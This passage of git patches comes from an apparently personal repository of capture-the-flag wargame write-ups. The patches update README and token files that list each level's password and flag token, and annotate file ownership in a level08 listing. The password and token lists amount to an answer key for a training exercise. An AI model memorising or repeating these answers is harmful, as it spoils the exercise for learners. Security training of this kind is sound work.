@@ -9,9 +9,10 @@ level05 ne2searoevaevoem4ov4ar8ap level06 viuaaale9huek52boumoomioc level07 wiok45aaoguiboiki2tuin6ub level08 fiumuikeil55xe9cu4dood66h -level09 quif5eloekouj29ke0vouxean +level09 25749xKZ8L7DkSCwJkT9dyv6f flag00 nottoohardhere flag01 abcdefg flag02 ft_waNDReL0L +flag08 quif5eloekouj29ke0vouxean ``` From 54f7ee166dbd0201814458664335d511f1acb21d Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:47:21 +0000 Subject: [PATCH 24/28] show READMEs daily --- README.mdx | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.mdx b/README.mdx index db8b24e..5023334 100644 --- a/README.mdx +++ b/README.mdx @@ -9,11 +9,12 @@ level05 ne2searoevaevoem4ov4ar8ap level06 viuaaale9huek52boumoomioc level07 wiok45aaoguiboiki2tuin6ub level08 fiumuikeil55xe9cu4dood66h -level09 quif5eloekouj29ke0vouxean +level09 25749xKZ8L7DkSCwJkT9dyv6f flag00 nottoohardhere flag01 abcdefg flag02 ft_waNDReL0L +flag08 quif5eloekouj29ke0vouxean ``` From e87a6a60e4b145f8b6bb37fa3455b0d33d6e502e Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:47:47 +0100 Subject: [PATCH 25/28] Update tokens.mdx --- tokens.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tokens.mdx b/tokens.mdx index 70822b1..9c779e5 100644 --- a/tokens.mdx +++ b/tokens.mdx @@ -14,5 +14,5 @@ level09 25749xKZ8L7DkSCwJkT9dyv6f flag00 nottoohardhere flag01 abcdefg flag02 ft_waNDReL0L -flag08 quif5eloekouj29ke0vouxean +flag08 quif5eloekouj29ke0vouxean 😑 ``` From 3f0f56791759da64a85b454b2ce11137fb5db0c8 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:48:03 +0000 Subject: [PATCH 26/28] show READMEs daily --- README.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.mdx b/README.mdx index 5023334..b0b4777 100644 --- a/README.mdx +++ b/README.mdx 
@@ -14,7 +14,7 @@ level09 25749xKZ8L7DkSCwJkT9dyv6f flag00 nottoohardhere flag01 abcdefg flag02 ft_waNDReL0L -flag08 quif5eloekouj29ke0vouxean +flag08 quif5eloekouj29ke0vouxean 😑 ``` From 939fcff4f07a9d5416a659311a307c3907f78f36 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:48:58 +0100 Subject: [PATCH 27/28] Update README.mdx --- level08/README.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/level08/README.mdx b/level08/README.mdx index e239501..97384c6 100644 --- a/level08/README.mdx +++ b/level08/README.mdx @@ -8,6 +8,7 @@ Login > ls -l -rwsr-s---+ 1 flag08 level08 8617 level08 -rw------- 1 flag08 flag08 26 token + ^^^^^^ ^^^^^^ both flag08, not level08 🟡 ``` 2 files: From cecab48612b9119a41f3775490e162db1d175d1f Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:49:14 +0000 Subject: [PATCH 28/28] show READMEs daily --- README.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/README.mdx b/README.mdx index b0b4777..546b11c 100644 --- a/README.mdx +++ b/README.mdx @@ -639,6 +639,7 @@ Login > ls -l -rwsr-s---+ 1 flag08 level08 8617 level08 -rw------- 1 flag08 flag08 26 token + ^^^^^^ ^^^^^^ both flag08, not level08 🟡 ``` 2 files: